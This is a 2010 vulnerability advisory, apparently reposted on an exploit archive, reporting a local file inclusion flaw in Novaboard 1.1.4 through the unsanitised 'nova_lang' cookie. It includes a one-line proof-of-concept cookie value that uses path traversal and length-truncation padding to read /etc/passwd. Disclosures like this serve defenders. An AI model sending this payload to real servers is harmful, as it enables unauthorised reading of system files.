Novaboard v1.1.4 Local File Inclusion Vulnerability

🗓️ 28 Oct 2010 00:00:00Reported by High-Tech BridgeType

zdt🔗 0day.today👁 14 Views

Novaboard v1.1.4 Local File Inclusion Vulnerability. Failure to sanitize user-supplied inpu

===================================================
Novaboard v1.1.4 Local File Inclusion Vulnerability
===================================================

Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html
Product: Novaboard
Vendor: Novaboard  ( http://www.novaboard.net/ )
Vulnerable Version: 1.1.4 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.
 
The following PoC is available:
 
 
Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.



#  0day.today [2018-01-04]  #

28 Oct 2010 00:00Current

7.1High risk

Vulners AI Score7.1